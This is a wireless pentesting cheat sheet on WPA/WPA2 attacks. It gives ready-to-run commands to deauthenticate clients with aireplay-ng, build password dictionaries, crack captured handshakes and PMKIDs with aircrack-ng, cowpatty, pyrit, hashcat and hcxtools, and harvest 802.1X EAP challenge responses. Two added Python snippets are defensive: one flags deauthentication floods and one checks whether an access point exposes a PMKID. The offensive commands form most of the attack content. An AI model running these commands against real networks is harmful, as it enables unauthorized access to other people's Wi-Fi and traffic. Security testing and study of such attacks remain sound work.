WPA/WPA2

WPA/WPA2 PSK

Deauthenticate a supplicant
aireplay-ng -0 20 -a <ap_mac> -c <supplicant_mac> <wlan1mon>

1. Deauthenticating with the broadcast address can be very efficient and convenient
2. Airodump should display “WPA Handshake”
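From the defender's side, the deauthentication step above is the noisiest part of the attack: a burst of deauthentication frames, or any deauthentication sent to the broadcast address, is something a wireless IDS or a capture review should alert on. The following is an added example, not part of the original cheat sheet: a minimal parser for the 802.11 management frame header that counts deauthentication frames per BSSID and flags floods and broadcast deauths. The sample frames, MAC addresses and the alert threshold are constructed for the example.

```python
"""Flag deauthentication floods in raw 802.11 management frames (added example)."""
import struct
from collections import Counter

BROADCAST = "ff:ff:ff:ff:ff:ff"

# 802.11 frame control: type 0 = management, subtype 12 = deauthentication
TYPE_MGMT = 0
SUBTYPE_DEAUTH = 12
SUBTYPE_BEACON = 8


def _mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def _unmac(mac: str) -> bytes:
    return bytes(int(x, 16) for x in mac.split(":"))


def parse_mgmt_frame(frame: bytes) -> dict:
    """Decode the fixed 24-byte MAC header of a management frame.

    Layout: frame control (2), duration (2), addr1/DA (6), addr2/SA (6),
    addr3/BSSID (6), sequence control (2). A deauthentication frame carries a
    2-byte little-endian reason code right after the header.
    """
    if len(frame) < 24:
        raise ValueError("frame shorter than an 802.11 management header")
    fc = frame[0]  # low byte of frame control: version | type | subtype
    info = {
        "type": (fc >> 2) & 0x3,
        "subtype": (fc >> 4) & 0xF,
        "da": _mac(frame[4:10]),
        "sa": _mac(frame[10:16]),
        "bssid": _mac(frame[16:22]),
    }
    if info["type"] == TYPE_MGMT and info["subtype"] == SUBTYPE_DEAUTH and len(frame) >= 26:
        info["reason"] = struct.unpack("<H", frame[24:26])[0]
    return info


def _sample_frame(subtype: int, da: str, sa: str, bssid: str, reason: int = 7) -> bytes:
    """Build a management frame header (+ reason code) for the constructed sample."""
    fc = (subtype << 4) | (TYPE_MGMT << 2)
    header = struct.pack("<BBH", fc, 0, 0) + _unmac(da) + _unmac(sa) + _unmac(bssid) + b"\x00\x00"
    body = struct.pack("<H", reason) if subtype == SUBTYPE_DEAUTH else b""
    return header + body


def deauth_report(frames, threshold: int = 10) -> dict:
    """Count deauth frames per BSSID and flag floods and broadcast deauths.

    Returns {bssid: {"count": n, "broadcast": n_bcast, "flood": bool}}.
    A legitimate AP deauthenticates a single station occasionally; tens of
    deauths in one capture window, or any broadcast deauth, deserves an alert.
    The threshold is an assumption to tune per environment.
    """
    counts, bcast = Counter(), Counter()
    for frame in frames:
        info = parse_mgmt_frame(frame)
        if info["type"] != TYPE_MGMT or info["subtype"] != SUBTYPE_DEAUTH:
            continue
        counts[info["bssid"]] += 1
        if info["da"] == BROADCAST:
            bcast[info["bssid"]] += 1
    return {
        b: {"count": counts[b], "broadcast": bcast[b],
            "flood": counts[b] >= threshold or bcast[b] > 0}
        for b in counts
    }


# Constructed capture window: locally administered MACs, not real devices.
AP = "02:00:00:00:aa:01"
STA = "02:00:00:00:bb:02"
SAMPLE_FRAMES = (
    [_sample_frame(SUBTYPE_BEACON, BROADCAST, AP, AP)]        # one beacon
    + [_sample_frame(SUBTYPE_DEAUTH, STA, AP, AP)] * 20       # targeted burst
    + [_sample_frame(SUBTYPE_DEAUTH, BROADCAST, AP, AP)]      # broadcast deauth
)

if __name__ == "__main__":
    for bssid, row in deauth_report(SAMPLE_FRAMES).items():
        print(bssid, row)
```

Feeding real frames in is a matter of stripping the radiotap header from a monitor-mode capture before calling `parse_mgmt_frame`; the report keys on the BSSID (addr3) because a spoofed deauth forges the AP's address, so the count attributed to your own BSSID is exactly what you want to watch.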

Dictionary generation

Concatenate + Uppercase

WifiKey, Networkkey…

nano lower_dico.txt
sed 's/^\(.\)/\U\1/' lower_dico.txt > upper_dico.txt
/usr/lib/hashcat-utils/combinator.bin lower_dico.txt lower_dico.txt > ll_dico.txt
/usr/lib/hashcat-utils/combinator.bin lower_dico.txt upper_dico.txt > lu_dico.txt
/usr/lib/hashcat-utils/combinator.bin upper_dico.txt lower_dico.txt > ul_dico.txt
/usr/lib/hashcat-utils/combinator.bin upper_dico.txt upper_dico.txt > uu_dico.txt
cat ll_dico.txt lu_dico.txt ul_dico.txt uu_dico.txt | sort | uniq > concatenated.txt

One Separator + Uppercase

Use this technique with multiple separators: -_$*
Wifi-key, Network-Key…

nano lower_dico.txt
sed 's/^\(.\)/\U\1/' lower_dico.txt > upper_dico.txt
hashcat -a 1 upper_dico.txt lower_dico.txt -j '$<SEPARATOR>' --stdout >> ul_seperated.txt
hashcat -a 1 upper_dico.txt upper_dico.txt -j '$<SEPARATOR>' --stdout >> uu_seperated.txt

Two Separator + Uppercase

Use this technique with multiple separators: -_$*
Wifi-Key-Network, Mobile-Wifi-Key…

nano lower_dico.txt
sed 's/^\(.\)/\U\1/' lower_dico.txt > upper_dico.txt
hashcat -a 1 upper_dico.txt uu_seperated.txt -j '$<SEPARATOR>' --stdout >> uuu_seperated.txt

Add rules

Each generated dictionary can be enhanced by applying rules to it

cat <created_dico.txt> | hashcat -r </usr/share/hashcat/rules/best64.rule> --stdout | sort | uniq > <final_dico.txt>

Crack

aircrack

aircrack-ng -w <dico> <cap.pcap>

Rainbow tables - cowpatty

genpmk -f <dico> -d <computed_hashes.txt> -s <essid>
cowpatty -r <cap.pcap> -d <computed_hashes.txt> -2 -s <essid>

GPU - pyrit

pyrit eval
pyrit -i <dico> import_passwords
pyrit -e <essid> create_essid
pyrit batch
pyrit -r <cap.pcap> -b <ap_mac> attack_db
rm -r ~/.pyrit/blobspace

GPU - hashcat

https://hashcat.net/cap2hccapx/
hashcat64.exe -m 2500 -r rules\best64.rule cap\capture.hccapx dict\custom_dict.txt

PMKID

It only works against APs that support roaming.
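The reason the attack depends on roaming support is that such an AP places a PMKID key data element (KDE) in the first EAPOL-Key message, before any station has proven knowledge of the passphrase. An administrator can check whether their own AP does this by inspecting a capture of message 1. The following is an added example, not part of the original cheat sheet or of hcxtools: a parser for the EAPOL-Key frame that identifies message 1 (pairwise, Ack set, MIC clear) and reports whether an unencrypted PMKID KDE is present. The two frames are constructed inline; the nonce and MIC are zero and the 16-byte PMKID value is a placeholder.

```python
"""Audit an EAPOL-Key message 1 for an exposed PMKID KDE (added example)."""
import struct

EAPOL_TYPE_KEY = 3
DESC_TYPE_RSN = 2
KDE_OUI_RSN = bytes.fromhex("000fac")
KDE_TYPE_PMKID = 4

# Key Information bits (IEEE 802.11 RSN key descriptor)
KI_PAIRWISE = 1 << 3
KI_ACK = 1 << 7
KI_MIC = 1 << 8
KI_ENCRYPTED_DATA = 1 << 12

# Fixed fields from descriptor type through Key Data Length (95 bytes):
# desc(1) key_info(2) key_len(2) replay(8) nonce(32) iv(16) rsc(8)
# key_id(8) mic(16) data_len(2)
_KEY_FIXED = struct.Struct(">BHHQ32s16sQQ16sH")


def parse_eapol_key(frame: bytes) -> dict:
    """Decode an EAPOL-Key frame (EAPOL header + RSN key descriptor)."""
    _version, ptype, body_len = struct.unpack(">BBH", frame[:4])
    if ptype != EAPOL_TYPE_KEY:
        raise ValueError("not an EAPOL-Key packet")
    body = frame[4:4 + body_len]
    (desc, key_info, _key_len, _replay, nonce, _iv, _rsc, _kid, mic,
     data_len) = _KEY_FIXED.unpack_from(body, 0)
    if desc != DESC_TYPE_RSN:
        raise ValueError("unexpected key descriptor type")
    key_data = body[_KEY_FIXED.size:_KEY_FIXED.size + data_len]
    return {"key_info": key_info, "nonce": nonce, "mic": mic, "key_data": key_data}


def is_message_1(key_info: int) -> bool:
    """M1 is the only pairwise message with Key Ack set and Key MIC clear."""
    return (bool(key_info & KI_PAIRWISE)
            and bool(key_info & KI_ACK)
            and not bool(key_info & KI_MIC))


def iter_kdes(key_data: bytes):
    """Yield (oui, data_type, payload) for each vendor-specific KDE (id 0xDD)."""
    off = 0
    while off + 2 <= len(key_data):
        eid, ln = key_data[off], key_data[off + 1]
        body = key_data[off + 2:off + 2 + ln]
        if eid == 0xDD and ln >= 4:
            yield body[:3], body[3], body[4:]
        off += 2 + ln


def pmkid_exposed(frame: bytes) -> bool:
    """True when an unencrypted message 1 advertises a PMKID KDE."""
    k = parse_eapol_key(frame)
    if not is_message_1(k["key_info"]) or k["key_info"] & KI_ENCRYPTED_DATA:
        return False
    return any(oui == KDE_OUI_RSN and t == KDE_TYPE_PMKID and len(p) == 16
               for oui, t, p in iter_kdes(k["key_data"]))


def _sample_m1(key_data: bytes) -> bytes:
    """Construct a synthetic message 1 (zero nonce/MIC) carrying key_data."""
    key_info = KI_PAIRWISE | KI_ACK | 0x02  # descriptor version 2
    body = _KEY_FIXED.pack(DESC_TYPE_RSN, key_info, 16, 1, bytes(32), bytes(16),
                           0, 0, bytes(16), len(key_data)) + key_data
    return struct.pack(">BBH", 2, EAPOL_TYPE_KEY, len(body)) + body


# Constructed samples: a PMKID KDE with a placeholder value, and the M1 a
# non-roaming AP sends (no key data at all).
SAMPLE_PMKID_KDE = (bytes([0xDD, 20]) + KDE_OUI_RSN
                    + bytes([KDE_TYPE_PMKID]) + bytes(range(16)))
M1_WITH_PMKID = _sample_m1(SAMPLE_PMKID_KDE)
M1_WITHOUT_PMKID = _sample_m1(b"")

if __name__ == "__main__":
    print("PMKID exposed:", pmkid_exposed(M1_WITH_PMKID))     # True
    print("PMKID exposed:", pmkid_exposed(M1_WITHOUT_PMKID))  # False
```

If the check reports exposure on your own AP and fast roaming is not needed, disabling PMKID caching / roaming features on the AP removes the pre-authentication material the attack relies on; where roaming is required, a long random passphrase or 802.1X is what makes the offline attack impractical.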

Installation

apt install libssl-dev libz-dev libpcap-dev libcurl4-openssl-dev
cd /opt
git clone https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool
make
make install
cd /opt
git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make
make install
cd /opt

Attack

1. Traffic capture

Opportunistic attack without mac filtering

hcxdumptool -o <pmkid.pcap> -i <wlan1mon> --filtermode=2 --enable_status=3

Target one or more BSSID

Copy one or more BSSIDs into a file, with all characters in uppercase and without any separator (remove all “:”).
Example: 50D72257AC2F

hcxdumptool -o <pmkid.pcap> -i <wlan1mon> --filterlist=<mac.txt> --filtermode=2 --enable_status=3

2. PCAP to hashes

hcxpcaptool -z <out.hashes> <pmkid.pcap>

3. Crack

Solution 1

WPA-PMKID-PBKDF2 (16800)

Solution 2

hcxpcaptool -o <hccapx.hashes> <pmkid.pcap>

WPA-PMKID-PBKDF2 (2500)

802.1X

EAP

Server certificate

1) For Windows, the challenge response can be obtained from a domain user account or a computer account, depending on the authentication mode.
2) In the default configuration of Windows 10, the PEAP properties have the setting “Tell user if the server’s identity can’t be verified”, meaning that the user will be prompted to verify the certificate. However, if “Don’t ask user to authorize new servers or trusted CAs” is set, it is not possible to retrieve the challenge response.

Client certificate

If the server certificate can be impersonated and a client certificate is required, it is possible to patch hostapd so that it does not verify the validity of the client certificate.
https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/